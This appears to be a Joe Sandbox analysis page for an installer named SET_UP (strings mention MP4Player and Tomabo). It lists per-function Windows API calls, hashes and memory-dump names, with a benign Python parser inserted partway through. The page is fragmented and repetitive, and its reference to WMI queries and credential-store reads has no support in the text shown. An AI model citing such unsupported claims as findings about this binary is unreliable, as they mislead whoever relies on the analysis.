• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: GlobalParam$EnabledLockMessagePostReuseUnlockUnpackWindowlstrcpyn
• String ID:
• API String ID: 2333435275-0
• Opcode ID: 47dbf1eae1b9e633d2b4bb8cbd9c9fb64c144de6c5103a1664e8b533a14496cb
• Instruction ID: bae499863c3f8554b913ab85d8b0dfe52ad19103e03a1fb064012f56d7a3e210
• Opcode Fuzzy Hash: 47dbf1eae1b9e633d2b4bb8cbd9c9fb64c144de6c5103a1664e8b533a14496cb
• Instruction Fuzzy Hash: C901A136600108BFDB41ABA1DD49EDF7BBCEF48304F004179BA05D6161DB349E51DBA8
APIs
• lstrlenW.KERNEL32(?), ref: 0041CDD1
• RegSetValueW.ADVAPI32(?,?,00000001,?,00000000), ref: 0041CDE5
• RegCreateKeyW.ADVAPI32(?,?,?), ref: 0041CDFC
• lstrlenW.KERNEL32(?), ref: 0041CE09
• RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,?,?), ref: 0041CE21
• RegCloseKey.ADVAPI32(?), ref: 0041CE2C
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: Valuelstrlen$CloseCreate
• String ID:
• API String ID: 306239685-0
• Opcode ID: be8254c5c1c35891994467fddd2e68db16e83aa0a65698724810a2577830e7c3
• Instruction ID: f52f2fd6d4ddf7f545d9d2de6a35cdb1ce5d1241ed194b3747800671f149007b
• Opcode Fuzzy Hash: be8254c5c1c35891994467fddd2e68db16e83aa0a65698724810a2577830e7c3
• Instruction Fuzzy Hash: 7C014C35180219BFDF214F61DC48FEA3B69FB04751F008421FA19D9160D772D961AB98
APIs
• __EH_prolog.LIBCMT ref: 0040CA64
  • Part of subcall function 0042E2D8: __EH_prolog.LIBCMT ref: 0042E2DD
  • Part of subcall function 004B6E7E: __EH_prolog.LIBCMT ref: 004B6E83
  • Part of subcall function 004B6E7E: FindResourceW.KERNEL32(?,00000000,00000005,00000001,?,00000000), ref: 004B6EBB
  • Part of subcall function 004B6E7E: LoadResource.KERNEL32(?,00000000,?,00000000), ref: 004B6EC3
  • Part of subcall function 004B6E7E: LockResource.KERNEL32(?,00000001,?,00000000), ref: 004B6ED0
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040CB9A
  • Part of subcall function 004B223F: __EH_prolog.LIBCMT ref: 004B2244
  • Part of subcall function 004B1F26: InterlockedDecrement.KERNEL32(-000000F4), ref: 004B1F3A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: H_prolog$Resource$DecrementFindInterlockedLoadLockMessageSend
• String ID: %s.%s%s$MP4Player$Tomabo
• API String ID: 2862935712-2079911099
• Opcode ID: 06002f98f3368dae9cd6956aaefcd24ec741cc7efaa572c827c2db947f9e70d3
• Instruction ID: 65472e363d7491809642994be6eea904b3d60718fdcf6d9742c08e5b4544893d
• Opcode Fuzzy Hash: 06002f98f3368dae9cd6956aaefcd24ec741cc7efaa572c827c2db947f9e70d3
• Instruction Fuzzy Hash: 13515A71D00248EFDB14EBA9C985EEEBBB9AF18314F10416EF515B3291CB785E08CB65
APIs
• __EH_prolog.LIBCMT ref: 004109E1
• GetVersionExW.KERNEL32(?,?,?,00000000), ref: 00410A3C
• lstrcpynW.KERNEL32(?,?,00100000,?,?,?,00000000), ref: 00410B67
Strings
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: H_prologVersionlstrcpyn
• String ID: @$L
• API String ID: 2508861242-22657231
• Opcode ID: 7d6bddc19510cfcf376fed0acf6eb0a9dce4ce5fd9d583a936a59551f656b9b7
• Instruction ID: 1bdff2053175d015a972fd86eddf71ef168b5de8771683e98cd4c1fa2e32d5de
• Opcode Fuzzy Hash: 7d6bddc19510cfcf376fed0acf6eb0a9dce4ce5fd9d583a936a59551f656b9b7
• Instruction Fuzzy Hash: A151A1706103088FCB25AF66C945ADE7BA5BF44308F00456FE44A9B352DBBC9985CF9D
APIs
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042C652
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042C66B
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042C68B
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042C6A8
Strings
• %X%I64X%I64X%I64X%I64X%I64X%I64X%s%s%I64X, xrefs: 0042C600
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
• String ID: %X%I64X%I64X%I64X%I64X%I64X%I64X%s%s%I64X
• API String ID: 885266447-3030311282
• Opcode ID: 34eed2107787deed370310be59b127d2c9faf6b4d4a6b3a0bb6e60450d7a0723
• Instruction ID: ebcd416a4ae9bcafc0a198760b9e8d3dda98d77b0342e54f53e437e4cb277a6e
• Opcode Fuzzy Hash: 34eed2107787deed370310be59b127d2c9faf6b4d4a6b3a0bb6e60450d7a0723
• Instruction Fuzzy Hash: 8E4140B2900219AEDF109FA6D8819EFBBB9FF48354F40456FE105F3240DB746A448BA9
APIs
• GetVersionExA.KERNEL32 ref: 0049CA3C
• GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 0049CA71
• GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0049CAD1
Strings
Similarity
• API ID: EnvironmentFileModuleNameVariableVersion
• String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
• API String ID: 1385375860-4131005785
• Opcode ID: 60dc34503d4cf6b98e40e444838f2bc28865fc0098d10e826fb233d56671cc9f
• Instruction ID: 7476b738a79431dd481cd19471d76dd401d4edf445982501db1ae2d4ddd21731
• Opcode Fuzzy Hash: 60dc34503d4cf6b98e40e444838f2bc28865fc0098d10e826fb233d56671cc9f
• Instruction Fuzzy Hash: F83113719452486DEF31C675ACC6BEE3F689B02704F2804FBD185DA242E638AE858B1D
APIs
• lstrlenA.KERNEL32(?,00000000), ref: 004B4DEA
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000001), ref: 004B4E0E
• SendDlgItemMessageW.USER32(?,?,0000040B,00000000,00000001), ref: 004B4E2E
• SendDlgItemMessageA.USER32(?,?,?,00000000,?), ref: 004B4E4F
Strings
Similarity
• API ID: ItemMessageSend$ByteCharMultiWidelstrlen
• String ID: kMK
• API String ID: 3573766508-521819267
• Opcode ID: a393aa5697fdccc84db3038a2c7ff2e05f2eb3815e9e3abb0e799a7967e03901
• Instruction ID: 9d7c9fe4fcbf2c43341ef40a679ab4b6edc109693a0426c652acf7cd3373fde5
• Opcode Fuzzy Hash: a393aa5697fdccc84db3038a2c7ff2e05f2eb3815e9e3abb0e799a7967e03901
• Instruction Fuzzy Hash: 51319075800215AADF209B5ADC449EFBBBCFBD5320F508127F961A2295C3389A42DB39
APIs
• __EH_prolog.LIBCMT ref: 0042CA58
  • Part of subcall function 004AF167: lstrlenW.KERNEL32(?,00000001,00508FBC,00000000,?,0042B3BC,?,?,?,?,?,00000000), ref: 004AF185
  • Part of subcall function 004AF167: lstrlenW.KERNEL32(00000000,?,0042B3BC,?,?,?,?,?,00000000), ref: 004AF1D8
  • Part of subcall function 004AF167: lstrlenW.KERNEL32(?,?,0042B3BC,?,?,?,?,?,00000000), ref: 004AF1A2
  • Part of subcall function 004AF167: lstrlenW.KERNEL32(?,?,?,?,00000000,?,0042B3BC,?,?,?,?,?), ref: 004AF2B7
Strings
Similarity
• API ID: lstrlen$H_prolog
• String ID: </div>$<div>$LicenseKey$Licensekey
• API String ID: 3834905643-2803411531
• Opcode ID: 63e86c8a0a56bd39fcef70d467b5ca27fb753f4c299b03a5d5b9dedd439c7383
• Instruction ID: f413031fe4c484b22bd72026cf67f67ddf6e04059db6cce8078240730d945f32
• Opcode Fuzzy Hash: 63e86c8a0a56bd39fcef70d467b5ca27fb753f4c299b03a5d5b9dedd439c7383
• Instruction Fuzzy Hash: 6E314535640118BADB14EF91EC52FEE3764EF21768F50C12EB9195A0D2DF78AA08C798
APIs
• __EH_prolog.LIBCMT ref: 0040CC8B
• SendMessageW.USER32(?,0000100C,000000FF,00000002), ref: 0040CCAC
  • Part of subcall function 004B01E6: SendMessageW.USER32(?,0000104B,00000000,?), ref: 004B021A
  • Part of subcall function 0041F066: GetModuleFileNameW.KERNEL32(?,00000000,000003FF), ref: 0041F0A2
  • Part of subcall function 004B1F26: InterlockedDecrement.KERNEL32(-000000F4), ref: 004B1F3A
• SendMessageW.USER32(?,00001008,?,00000000), ref: 0040CDB8
Strings
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: MessageSend$DecrementFileH_prologInterlockedModuleName
                                                                                                                                                                                                  • String ID: %s\%s$Data\File Types
                                                                                                                                                                                                  • API String ID: 2962548239-1174472317
                                                                                                                                                                                                  • Opcode ID: decf278a1d76cd6922878d9975aae44f8cb03dbdbb5a33284ddad7796e9ba209
                                                                                                                                                                                                  • Instruction ID: e5b89edc2a78572c049701f4a7e7d00ffedea8fed11cf49f28584d29c8090744
                                                                                                                                                                                                  • Opcode Fuzzy Hash: decf278a1d76cd6922878d9975aae44f8cb03dbdbb5a33284ddad7796e9ba209
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7A419D70A00246ABCF11EBA4C946BEEBBB4AF14314F10456EF411A32D2DB789A04CBA5
APIs
• __EH_prolog.LIBCMT ref: 00405D6F
• CreateCompatibleDC.GDI32(00000000), ref: 00405DDD
• CreateCompatibleBitmap.GDI32(00000001,?,?), ref: 00405E2D
Strings
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: CompatibleCreate$BitmapH_prolog
• String ID: <L
• API String ID: 595870127-3438057367
• Opcode ID: 03059e5edefd6bdc0b51e31d592b3767dd72731fcb13be42391047ace6846210
• Instruction ID: af47fab676e03846496108c5720f2cf3df75dcde79d37731e01ef5976b41ed65
• Opcode Fuzzy Hash: 03059e5edefd6bdc0b51e31d592b3767dd72731fcb13be42391047ace6846210
• Instruction Fuzzy Hash: 1E315771600A06EFCB60DF69C484A5AFBF5FF48300B148A2EE55AD7A11D738E915CFA4
APIs
  • Part of subcall function 004BC729: GetParent.USER32(00000001), ref: 004BC75C
  • Part of subcall function 004BC729: GetLastActivePopup.USER32(00000001), ref: 004BC76B
  • Part of subcall function 004BC729: IsWindowEnabled.USER32(00000001), ref: 004BC780
  • Part of subcall function 004BC729: EnableWindow.USER32(00000001,00000000), ref: 004BC793
• SendMessageW.USER32(?,00000376,00000000,00000000), ref: 004BC5E7
• GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,00000000), ref: 004BC655
• MessageBoxW.USER32(00000000,?,?,00000000), ref: 004BC663
• EnableWindow.USER32(00000000,00000001), ref: 004BC67F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: Window$EnableMessage$ActiveEnabledFileLastModuleNameParentPopupSend
• String ID: ZuK
• API String ID: 1958756768-757884895
• Opcode ID: 2524a1cbecec9fef697faf39bdcf364b7581af3dc850b3b935e0e56f2befe174
• Instruction ID: f1df70e2290fc2d2fe0d72604373d03f9904a955754873a767017330b1a7def4
• Opcode Fuzzy Hash: 2524a1cbecec9fef697faf39bdcf364b7581af3dc850b3b935e0e56f2befe174
• Instruction Fuzzy Hash: B821A272A00118AFDB209F99CCC5FEEB7B9EB44340F54052BE510E7290D7789D418BB4
APIs
• SendMessageW.USER32(?,00000362,0000E002,00000000), ref: 004C1C8D
• UpdateWindow.USER32(?), ref: 004C1CA4
• GetParent.USER32(?), ref: 004C1D0F
• PostMessageW.USER32(?,0000036A,00000000,00000000), ref: 004C1D2B
Strings
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: Message$ParentPostSendUpdateWindow
• String ID: @
• API String ID: 4141989945-2766056989
• Opcode ID: 4c548786664895c572b44897fc2fd2c11b12efc75089fa024e3a3bcf79450b95
• Instruction ID: 2231267e6badd0d97d184dec044adb1fc40352e711288d73e71231d7bc74193c
• Opcode Fuzzy Hash: 4c548786664895c572b44897fc2fd2c11b12efc75089fa024e3a3bcf79450b95
• Instruction Fuzzy Hash: 8731EF35640B01AFEB704F25CC08FAA77A5BF16310F11492EF95B562B2C7B8A801DB08
APIs
  • Part of subcall function 004012B4: GetStockObject.GDI32(00000011), ref: 004012BD
  • Part of subcall function 004012B4: GetStockObject.GDI32(0000000D), ref: 004012C5
  • Part of subcall function 004012B4: GetObjectW.GDI32(00000000,0000005C,?), ref: 004012D5
• CreateFontIndirectW.GDI32(?), ref: 00401248
• CreateFontIndirectW.GDI32(?), ref: 0040125E
• CreateFontIndirectW.GDI32(?), ref: 0040127B
• CreateFontIndirectW.GDI32(?), ref: 0040129F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: CreateFontIndirect$Object$Stock
• String ID: d
• API String ID: 2458975687-2564639436
• Opcode ID: 2f4853a599195851c53df997fc91c2c1399d35c4a64f642c7afdf37ff59aef04
• Instruction ID: c1957a133e74b13259c21287822754b9258933da2d129373de141462a18b7cdf
• Opcode Fuzzy Hash: 2f4853a599195851c53df997fc91c2c1399d35c4a64f642c7afdf37ff59aef04
• Instruction Fuzzy Hash: 8E112D72D00198AACB14EBF5C889ECEBF7CEF05314F00412BE515E6155DBB4B90ACBA0
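The function blocks above are easier to triage once the API lines and the memory-dump identifiers are turned into structured records. The script below is an added example written for this page; it is not Joe Sandbox code. It assumes that an API line has the shape "Func.MODULE(args), ref: address" (with an optional "Part of subcall function XXXXXXXX:" prefix, as seen above), and that in the dotted .sdmp name the fourth field is the region base address and the fifth a Windows PAGE_* protection value. That second assumption is not documented on the page; it is only consistent with the values shown here (0x20 on the code section at 0x401000, 0x02 on the PE header at 0x400000, 0x04 and 0x08 on data regions). The other dotted fields are left undecoded. The sample input is constructed in the shape of the blocks above.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# winnt.h memory-protection constants. Assumption (not stated by the report):
# the fifth dotted field of a .sdmp name carries one of these values. The
# values on this page fit that reading (0x20 on the code section at 0x401000,
# 0x02 on the PE header at 0x400000, 0x04 / 0x08 on writable data).
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}

# "• Func.MODULE(arg,arg), ref: 0040XXXX", optionally prefixed with
# "Part of subcall function 004BC729:" for calls made by an inlined callee.
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<func>[A-Za-z_][\w@]*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Eight dotted fields; only the base address and the protection are decoded.
DUMP_RE = re.compile(
    r"[0-9A-Fa-f]{8}\.[0-9A-Fa-f]{8}\.(?P<dump_id>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<prot>[0-9A-Fa-f]{8})"
    r"(?:\.[0-9A-Fa-f]{8}){3}\.sdmp"
)


@dataclass
class ApiCall:
    function: str
    module: str
    args: List[str]
    ref: int
    subcall_of: Optional[str]  # address of the callee the line belongs to, if any


@dataclass
class DumpRegion:
    dump_id: int
    base: int
    protection: int

    @property
    def protection_name(self) -> str:
        return PAGE_PROTECTION.get(self.protection, f"UNKNOWN(0x{self.protection:02X})")


def parse_api_line(line: str) -> Optional[ApiCall]:
    m = API_RE.match(line)
    if not m:
        return None
    raw = m.group("args")
    args = [a.strip() for a in raw.split(",")] if raw else []
    return ApiCall(m.group("func"), m.group("mod"), args, int(m.group("ref"), 16), m.group("sub"))


def parse_dump_name(text: str) -> Optional[DumpRegion]:
    m = DUMP_RE.search(text)
    if not m:
        return None
    return DumpRegion(int(m.group("dump_id")), int(m.group("base"), 16), int(m.group("prot"), 16))


def parse_block(text: str):
    """Split one function block into its API calls and memory regions."""
    apis, regions = [], []
    for line in text.splitlines():
        call = parse_api_line(line)
        if call:
            apis.append(call)
            continue
        region = parse_dump_name(line)
        if region:
            regions.append(region)
    return {"apis": apis, "regions": regions}


def modules_touched(calls: List[ApiCall]) -> List[str]:
    """Modules the function calls directly (subcall lines excluded)."""
    return sorted({c.module for c in calls if c.subcall_of is None})


# Constructed sample in the shape of the report's blocks (not copied verbatim).
SAMPLE = """\
APIs
• __EH_prolog.LIBCMT ref: 00405D6F
• CreateCompatibleDC.GDI32(00000000), ref: 00405DDD
  • Part of subcall function 004BC729: GetParent.USER32(00000001), ref: 004BC75C
• SendMessageW.USER32(?,00000376,00000000,00000000), ref: 004BC5E7
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
"""

if __name__ == "__main__":
    parsed = parse_block(SAMPLE)
    for c in parsed["apis"]:
        via = f"  [via {c.subcall_of}]" if c.subcall_of else ""
        print(f"{c.ref:08X} {c.module}!{c.function}({', '.join(c.args)}){via}")
    for r in parsed["regions"]:
        print(f"region base=0x{r.base:X} prot={r.protection_name} dump={r.dump_id}")
    print("modules:", modules_touched(parsed["apis"]))
```

Feeding a whole function section through `parse_block` gives a per-function list of module!API calls with their return addresses, which is what you cross-reference against the behaviour signatures at the top of the report (for example, which function at which address performs the WMI queries or the credential-store reads).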
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 004012B4: GetStockObject.GDI32(00000011), ref: 004012BD
                                                                                                                                                                                                    • Part of subcall function 004012B4: GetStockObject.GDI32(0000000D), ref: 004012C5
                                                                                                                                                                                                    • Part of subcall function 004012B4: GetObjectW.GDI32(00000000,0000005C,?), ref: 004012D5
                                                                                                                                                                                                  • CreateFontIndirectW.GDI32(?), ref: 00401248
                                                                                                                                                                                                  • CreateFontIndirectW.GDI32(?), ref: 0040125E
                                                                                                                                                                                                  • CreateFontIndirectW.GDI32(?), ref: 0040127B
                                                                                                                                                                                                  • CreateFontIndirectW.GDI32(?), ref: 0040129F
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CreateFontIndirect$Object$Stock
                                                                                                                                                                                                  • String ID: d
                                                                                                                                                                                                  • API String ID: 2458975687-2564639436
                                                                                                                                                                                                  • Opcode ID: bb8162c3438da65ac484d1c100f7d1b1cb9428e64c68e3329cdb98b6b547188d
                                                                                                                                                                                                  • Instruction ID: 18f3d6789f81c3536959801a03654768a7ba9371a523a7b47540a0f8f6fd41c3
                                                                                                                                                                                                  • Opcode Fuzzy Hash: bb8162c3438da65ac484d1c100f7d1b1cb9428e64c68e3329cdb98b6b547188d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9C010072D001996ACB14EBF5CC45ECEBF7CAF04314F00412BA515E6155DB74B90ACBA1
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                                                                  • String ID: 5.1$Auto$Mono$Stereo
                                                                                                                                                                                                  • API String ID: 3519838083-1523637749
                                                                                                                                                                                                  • Opcode ID: 88442daff2d2f7e35d07099bf95e43f3676171bffd4d87cfcb45086ee8b6e045
                                                                                                                                                                                                  • Instruction ID: dc4fde91dc6df69067ce0ec147e91ddfcaaa6cb3b19d339eeaf85b9c165f4930
